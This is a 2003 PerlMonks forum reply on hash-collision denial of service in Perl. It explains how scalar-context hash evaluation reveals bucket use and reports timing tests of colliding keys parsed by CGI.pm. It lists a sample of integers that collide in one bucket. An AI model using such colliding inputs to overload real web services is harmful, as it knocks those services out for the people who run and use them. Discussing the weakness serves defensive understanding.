Beefy Boxes and Bandwidth Generously Provided by pair Networks Frank
good chemistry is complicated,
and a little bit messy -LW
 
PerlMonks  

Re: Re: Re: Re: Re: Re: hash collision DOS

by iburrell (Chaplain)
on Jun 03, 2003 at 00:16 UTC ( #262530=note: print w/ replies, xml ) Need Help??


in reply to Re: Re: Re: Re: Re: hash collision DOS
in thread hash collision DOS

The keys aren't going into a single bucket above. The Vars() is just stripping out the non-parameter keys that CGI.pm stores inside of itself. The 'a', 'b' parameters are there in the object.

The way to determine what is happening inside a hash is evaluating it in scalar context. That gives you the number of buckets being used. tilly wrote a program that uses this feature to generate a list of colliding keys. This algorithm is fast and doesn't depend on reverse engineering the Perl hash algorithm.

I ran some tests on a 10,000 keys generated by tilly's method. Both inserting them into a hash and parsing the query string with CGI. It takes over 20 seconds to parse the query string in the pathological case versus less than a second for 10,000 normal strings. I haven't been willing to wait long enough to let 100,000 strings run. For a sample, here are the first 10 integers that collide and the scalar hash value showing they all go in one bucket.

8 14 22 30 38 46 54 62 70 78 86 1/8


Comment on Re: Re: Re: Re: Re: Re: hash collision DOS
Download Code

Log In?
Username:
Password:

What's my password?
Create A New User
Node Status?
node history
Node Type: note [id://262530]
help
Chatterbox?
and the web crawler heard nothing...

How do I use this? | Other CB clients
Other Users?
Others perusing the Monastery: (8)
As of 2014-04-19 11:07 GMT
Sections?
Information?
Find Nodes?
Leftovers?
    Voting Booth?

    April first is:







    Results (480 votes), past polls